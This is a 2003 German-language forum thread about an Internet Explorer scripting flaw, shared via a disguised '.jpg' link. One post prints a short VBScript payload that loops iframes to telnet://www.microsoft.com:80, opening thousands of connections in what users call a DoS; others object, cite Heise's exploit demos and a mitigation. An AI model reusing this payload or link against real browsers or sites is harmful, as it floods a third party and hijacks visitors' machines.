ThaWild 10 Geschrieben 24. November 2003 Melden Geschrieben 24. November 2003 Hier wieder eine Sicherheitslücke vom IE... www.mozilla.linuxfaqs.de/Geil.jpg Achtung! Nicht sehr empfehlenswert mit dem IE aufzumachen. Do it on your own risk! Zitieren
saracs 10 Geschrieben 24. November 2003 Melden Geschrieben 24. November 2003 hi thawild, was passiert denn wenn man den link mitm ie aufmacht!? habs mitm firebird geöffnet und bekomm nur ne meldung das das bild fehler enthält. wäre nett wenn du ein paar mehr infos dazu geben könntest ;) gruss saracs Zitieren
ThaWild 10 Geschrieben 24. November 2003 Autor Melden Geschrieben 24. November 2003 ausprobieren ;) es zeigt nur eine IE-Sicherheitslücke auf, nix verheerendes, is ja von ner namhaften seite ;) aber wer den link mitm IE aufmacht überlegt sich dann sicher ober weiterhin seine Bankgeschäfte oder ähnliches mit dem IE durchführt Die Sicherheitslücken vom IE werden ja großteil verniedlicht aber der link veranschaulicht schon! greez stefan PS: Wie gesagt "auf eigene Gefahr ;)" Zitieren
gismo 10 Geschrieben 24. November 2003 Melden Geschrieben 24. November 2003 Habe es mal ausprobiert erstmal meldet sich mein Virusscanner der ein virus entdeckt hat *VBS/DDos-iframeNet.a und dann öffenen sich n aufen Hyperterminals zu Microsoft.com ist schon krass was man so alles machen kann Zitieren
ThaWild 10 Geschrieben 24. November 2003 Autor Melden Geschrieben 24. November 2003 is aber kein virus sondern nur ein script...;) <edit> n haufen = 12000 ;) </edit> Zitieren
Lian 2.531 Geschrieben 24. November 2003 Melden Geschrieben 24. November 2003 Stimmt . . . nett - und so simpel :shock: <script type="text/vbscript"> for a=1 to 800 document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">") next </script> das ganze ein ca. 10 mal hintereinander Mein Scanner hat auch angeschlagen und mir sogar den Zugriff auf die Datei verweigert ;) Zitieren
Dr.Doom 10 Geschrieben 27. November 2003 Melden Geschrieben 27. November 2003 Natürlich mußte ich es auchsofort mal probieren ! Typisch eigendlich !!!! Wenn ich nicht drauf vorbereitet gewesen wäre hätte ich mich echt erschrocken!!! Zitieren
thorgood 10 Geschrieben 28. November 2003 Melden Geschrieben 28. November 2003 Im Allgemeinen fand ich dieses Board bisher sehr gut, informativ und seriös. Hier einen Link zu veröffentlichen auf einen offiziell eingestuften Trojaner der ein Denial Of Svc auf microsoft.com vornimmt finde ich komplett am Ziel vorbei. thorgood Zitieren
Lian 2.531 Geschrieben 28. November 2003 Melden Geschrieben 28. November 2003 Nun ja, selbst bei Heise findet man eine Liste aktueller Exploits: http://www.heise.de/security/dienste/browsercheck/demos/ie/ Zur Abhilfe oben beschriebenen Exploits: Einzige Abhilfe ist derzeit, Active Scripting für die Internet-Zone zu deaktivieren (Heise). Zitieren
MiLLHouSe 15 Geschrieben 28. November 2003 Melden Geschrieben 28. November 2003 Ist das auf der nachfolgenden Seite dann auch sowas in der Art wie der obige Link?? (Vorsicht, es öffnen sich ewig viele Fensterchen!!!) http://www.deutscherfussball.de.ms BETRETEN AUF EIGENE GEFAHR!!!! Zitieren
thorgood 10 Geschrieben 28. November 2003 Melden Geschrieben 28. November 2003 Hallo Lian, ja die tun das lokal auf dem PC. Der Link oben lässte bis zu 12000 Connections bei http://www.microsoft.com öffnen und das stellt offiziell einen DOS Angriff dar. Find ich für ein von Microsoft empfohlenem Board geschmacklos. thorgood Zitieren
boardadmin 0 Geschrieben 28. November 2003 Melden Geschrieben 28. November 2003 Okay, der link ist jetzt nicht mehr anklickbar, mehr wäre Zensur bzw. Totschweigen, Mir wäre der thread mit einem Hinweis zu einem Patch auch lieber, aber den gibt es leider (noch) nicht. Ich denke, hier wäre MS gefragt. Zitieren
Empfohlene Beiträge
Schreibe einen Kommentar
Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.